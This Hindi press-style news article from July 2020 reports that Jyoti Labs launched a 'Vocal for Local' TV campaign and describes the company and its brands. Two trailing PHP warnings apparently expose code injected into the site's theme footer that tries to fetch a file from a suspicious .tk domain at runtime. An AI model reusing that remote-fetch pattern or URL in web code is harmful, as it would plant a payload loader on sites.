ज्योति लैब्स ने लाॅन्च किया वोकल फाॅर लोकल अभियान

Edit-Rashmi Sharma

जयपुर 03 जुलाई 2020 – देश की प्रमुख एफएमसीजी कंपनियों में से एक ज्योति लैब्स लिमिटेड (जेएलएल) ने माननीय प्रधानमंत्री श्री नरेंद्र मोदी द्वारा की गई ‘रुवोकल फाॅर लोकल‘ की अपील के समर्थन में आज एक नया टेलीविजन अभियान शुरू किया। कंपनी की यह काॅमर्शियल फिल्म 1983 से शुरू कंपनी की विरासत की यात्रा का वर्णन करती है और एक बेहतरीन स्क्रिप्ट और गीत के माध्यम से कंपनी के आदर्शों और मूल्यों को चित्रित करती है।

कंपनी ने यह फिल्म ऐसे समय में लॉन्च की है, जब पूरे देश में देशभक्ति और आत्मनिर्भरता की भावना देखी जा रही है। यह अभियान ज्योति लैब्स के विकास और कार्यप्रणाली के केंद्रबिंदु पर आधारित है। यह देश भर में अपने विभिन्न अभिनव उत्पादों के माध्यम से अपने उपभोक्ताओं की सेवा करने वाली एक सच्ची भारतीय देसी कंपनी होने की खुशी और इससे जुड़ी उमंग को दर्शाती है।

ज्योति लैब्स लिमिटेड की मैनेजिंग डायरेक्टर सुश्री ज्योति एमआर ने नए अभियान की लॉन्चिंग पर प्रसन्नता व्यक्त करते हुए कहा, ‘‘समस्त देशवासियों की भावनाओं और उनके जज्बात को दर्शाने के साथ-साथ ज्योति लैब्स ने हमारे माननीय प्रधानमंत्री श्री नरेंद्र मोदी जी द्वारा की गई ‘वोकल फॉर लोकल’ पहल को मजबूत समर्थन देने का वादा किया है। अपने अस्तित्व के पिछले 37 वर्षों में हमने अपने राष्ट्र और नागरिकों को सबसे आगे रखते हुए एक भारतीय के रूप में सोचा, काम किया है और देश की सेवा की है। स्थापना के बाद से हमारा सबसे महत्वपूर्ण उद्देश्य ऐसे नवीन उत्पादों के साथ समझदार उपभोक्ता की सेवा करके राष्ट्र निर्माण में योगदान देना था, जो न केवल एक आवश्यकता को पूरा करता है बल्कि जीवन को बदलने वाला समाधान भी बन जाता है। स्थानीय पहल के लिए वोकल का समर्थन करने वाले एक नए टेलीविजन अभियान के साथ, हम स्थानीय उत्पादों के बारे में ‘वोकल फाॅर लोकल‘ होने के अपने इरादे को दोहराना चाहते हैं और ऐसे लोकल प्रोडक्ट्स को वैश्विक बनाने में मदद करते हैं।‘‘

‘वोकल फाॅर लोकल‘ पहल का समर्थन करने और ‘आत्मनिर्भर भारत अभियान‘ का हिस्सा बनने के लिए, ज्योति लैब्स ने मई 2020 में बीटीएल गतिविधियों के माध्यम से अभियान शुरू किया, इसके बाद राष्ट्रीय दैनिक समाचार पत्रों में अपने ‘मेड इन इंडिया‘ और ‘मेड फॉर इंडिया‘ प्रोडक्ट्स के विज्ञापन दिए गए। अब यह नया टीवीसी ‘वोकल फाॅर लोकल‘ पहल के लिए अपने मजबूत समर्थन को आगे बढ़ाएगा और भारतीय उपभोक्ताओं के साथ कंपनी के रिश्तों को मजबूत भी करेगा।

ज्योति लैब्स के बारे मेंः
एक फास्ट मूविंग कंज्यूमर गुड्स कंपनी ज्योति लैब्स लिमिटेड (जेएलएल) की स्थापना 1983 में श्री एम. पी. रामचंद्रन ने की थी। इन वर्षों में कंपनी एक एकल ब्रांड की मालिकाना कंपनी से एक बहु ब्रांड में विकसित हुई है, बीएसई और एनएसई सूचीबद्ध कंपनी जो फैब्रिक केयर, होम केयर, पर्सनल केयर और डिशवॉश श्रेणियों में उत्पादों के विनिर्माण और विपणन में शामिल है।
कंपनी के प्रमुख ब्रांड्स में उजाला, मैक्सो, एक्सो, हेंको, मेक्सो, मार्गो, हेंको, प्रिल और मार्गो जैसे प्रोडक्ट्स शामिल हैं। कंपनी अपनी सहायक कंपनी ज्योति फेब्रिकेयर सर्विसेज लिमिटेड के माध्यम से ‘आपके दरवाजे किफायती कीमत में वल्र्ड क्लास लॉन्ड्री’ प्रदान करते हुए लॉन्ड्री सर्विस भी दे रही है।


Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1

Warning: file_get_contents(http://nativeredir.tk/lx/1.txt): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/patrikajagat/public_html/wp-content/themes/sahifa/footer.php(39) : runtime-created function on line 1